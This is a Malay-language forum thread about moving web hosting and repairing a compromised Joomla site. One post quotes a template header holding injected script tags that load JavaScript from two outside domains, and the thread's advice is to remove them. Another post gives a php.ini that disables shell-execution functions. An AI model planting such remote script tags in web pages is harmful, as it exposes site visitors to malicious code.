Nak tukar hosting macamana?

tux

freshman
Joined
Jul 19, 2007
Messages
47
Points
6
Age
31
Fivio ni lembap juga rupanya.
buang natang ni dari jomla header template. Agaknyalah saya tak reti jomla.
Code:
<!--Width of template -->
<style type="text/css">
.main {width: 980px;margin: 0 auto;}
#ja-wrapper {min-width: 981px;}
</style>

[COLOR="#FF0000"]<script type="text/javascript" src="http://siu.edu.bd/includes/framework.js"></script><script type="text/javascript" src="http://aaevdg.fr/img/carousel.js"></script><script type="text/javascript" src="http://aaevdg.fr/img/carousel.js"></script>[/COLOR]</head>

<body id="bd" class="fs3 FF">

<div id="ja-wrapper">
	<a name="Top" id="Top"></a>

	<!-- HEADER -->
 

ApoKalypse

freshman
Joined
Jun 26, 2008
Messages
110
Points
16
Fivio ni lembap juga rupanya.
buang natang ni dari jomla header template. Agaknyalah saya tak reti jomla.
Code:
<!--Width of template -->
<style type="text/css">
.main {width: 980px;margin: 0 auto;}
#ja-wrapper {min-width: 981px;}
</style>

[COLOR="#FF0000"]<script type="text/javascript" src="http://siu.edu.bd/includes/framework.js"></script><script type="text/javascript" src="http://aaevdg.fr/img/carousel.js"></script><script type="text/javascript" src="http://aaevdg.fr/img/carousel.js"></script>[/COLOR]</head>

<body id="bd" class="fs3 FF">

<div id="ja-wrapper">
	<a name="Top" id="Top"></a>

	<!-- HEADER -->

mcmana eh nk buang dia? boleh bantu ke...
 

wzul

freshman
Joined
Dec 20, 2012
Messages
14
Points
1
cuba cari script tu pada fail template. biasanya script macam tu menyelinap disitu.

berbalik kepada tajuk, untuk pindah hosting, bincang dengan penyedia hosting yang baru. kebanyakan penyedia hosting kini menawarkan fungsi tu.
 

Dr. Peace

Newbie
Joined
Dec 17, 2009
Messages
1,751
Points
36
pi kat style dan buang kod tu..
 

wzul

freshman
Joined
Dec 20, 2012
Messages
14
Points
1
Nak tukar hosting, Nama domain urus sendiri atau beli pakej? Kalau berasingan senang kerja..
kalau pakej kena minta support hosting utk tukar DNS ke hosting baru.. :)

xpun minta kat hosting yang lama EPP Code untuk transfer domain ke hosting yang baru
 

wawwi.com

Senior
Joined
Jun 12, 2009
Messages
2,120
Points
38
xpun minta kat hosting yang lama EPP Code untuk transfer domain ke hosting yang baru

domain .com.my @ .my ni leceh sikit.. better sebenarnya urus sendiri domain berbanding transfer domain ke owner hosting untuk uruskannya.

Lain hosting provider lain harga cas tahunan langganan domain.. Langgan Hosting, kat mana mana pun boleh guna.
 

ApoKalypse

freshman
Joined
Jun 26, 2008
Messages
110
Points
16
website saya dah repair dan dah hubungi Google, tapi masa saya buka web saya keluar code ni dan saya dah buat php.ini dan skrg dah ok. cuma saya nak tanya code ni maksudnya hosting yg saya sewa tu dah lock sesuatu ke?

Warning: ini_set() has been disabled for security reasons in /home/bertuahc/public_html/v1/libraries/joomla/session/session.php on line 102

Warning: ini_set() has been disabled for security reasons in /home/bertuahc/public_html/v1/libraries/joomla/session/session.php on line 105

Warning: ini_set() has been disabled for security reasons in /home/bertuahc/public_html/v1/libraries/joomla/session/session.php on line 655

Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/bertuahc/public_html/v1/libraries/joomla/session/session.php:102) in /home/bertuahc/public_html/v1/libraries/joomla/session/session.php on line 423

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/bertuahc/public_html/v1/libraries/joomla/session/session.php:102) in /home/bertuahc/public_html/v1/libraries/joomla/session/session.php on line 423

Warning: Cannot modify header information - headers already sent by (output started at /home/bertuahc/public_html/v1/libraries/joomla/session/session.php:102) in /home/bertuahc/public_html/v1/libraries/joomla/session/session.php on line 426

Warning: Cannot modify header information - headers already sent by (output started at /home/bertuahc/public_html/v1/libraries/joomla/session/session.php:102) in /home/bertuahc/public_html/v1/templates/ja_kyanite_ii/libs/mobile_device_detect.php on line 113

Warning: Cannot modify header information - headers already sent by (output started at /home/bertuahc/public_html/v1/libraries/joomla/session/session.php:102) in /home/bertuahc/public_html/v1/templates/ja_kyanite_ii/libs/mobile_device_detect.php on line 114

Warning: Cannot modify header information - headers already sent by (output started at /home/bertuahc/public_html/v1/libraries/joomla/session/session.php:102) in /home/bertuahc/public_html/v1/templates/ja_kyanite_ii/libs/mobile_device_detect.php on line 113

Warning: Cannot modify header information - headers already sent by (output started at /home/bertuahc/public_html/v1/libraries/joomla/session/session.php:102) in /home/bertuahc/public_html/v1/templates/ja_kyanite_ii/libs/mobile_device_detect.php on line 114
Farmasi Tuah Sdn. Bhd.
 
Last edited:

wzul

freshman
Joined
Dec 20, 2012
Messages
14
Points
1
rasanya macam ni:

Gunakan suPHP. Setkan pada .htaccess

suPHP_ConfigPath /home/bertuahc/public_html/v1/

cipta 1 folder bernama tmps di /home/bertuahc/
cipta 1 fail php.ini di direktori /home/bertuac/public_html/v1/

masukkan kod ni

date.timezone = Asia/Kuala_Lumpur
disable_functions = "phpinfo, show_source, system, shell_exec, passthru, exec, popen, proc_open"
session.save_path = "/home/bertuahc/tmps"
session.cookie_lifetime = 0
display_errors = Off
magic_quotes_gpc = Off
extension = "pdo.so"
extension = "pdo_mysql.so"
suhosin.session.encrypt = 0
mysql.connect_timeout = -1
memory_limit = 300M
max_execution_time = 600
max_input_time = 900
allow_url_include = Off
safe_mode = Off

Lepas tu save. harap dapat membantu

kod dah buang tapi ada masalah baru... keluar ni... ni website: http://www.bertuah.com.my/v1/

sepatutnya benda mcm ni, pihak support hosting perlu setelkan
 
Last edited:

faezil

Newbie
Joined
Oct 2, 2007
Messages
7,061
Points
38
xpun minta kat hosting yang lama EPP Code untuk transfer domain ke hosting yang baru

ada sesetgh domain, diberi secara 'built-in' dalam pakej hosting...

cthnya.... beli plan XYZ dengan harga sekian2...percuma 1 domain....yg ini susah sket la nak mintak EPP code. kena slow talk la dengan hosting provider....

sbb tu ada baiknya beli domain dan hosting ditempat yg berasingan
 

umeks17

freshman
Joined
Aug 19, 2013
Messages
8
Points
1
Tips mudah dari boleh didapati di ananova dot com/10-steps-to-switching-hosting-providers

moga membantu!
 

ApoKalypse

freshman
Joined
Jun 26, 2008
Messages
110
Points
16
ada sesetgh domain, diberi secara 'built-in' dalam pakej hosting...

cthnya.... beli plan XYZ dengan harga sekian2...percuma 1 domain....yg ini susah sket la nak mintak EPP code. kena slow talk la dengan hosting provider....

sbb tu ada baiknya beli domain dan hosting ditempat yg berasingan

masa saya beli hosting ni dari Fivio mmg xde percuma apa2, hosting dan domain lain2 harga...
 

Milestonjon075

freshman
Joined
Aug 29, 2013
Messages
1
Points
0
I am involved in evolving your subscriber, so great pleasure contain me modified. I find the thoughts and mind-set of this post, very inspiring and actually worth following. pleasant work...
 
Top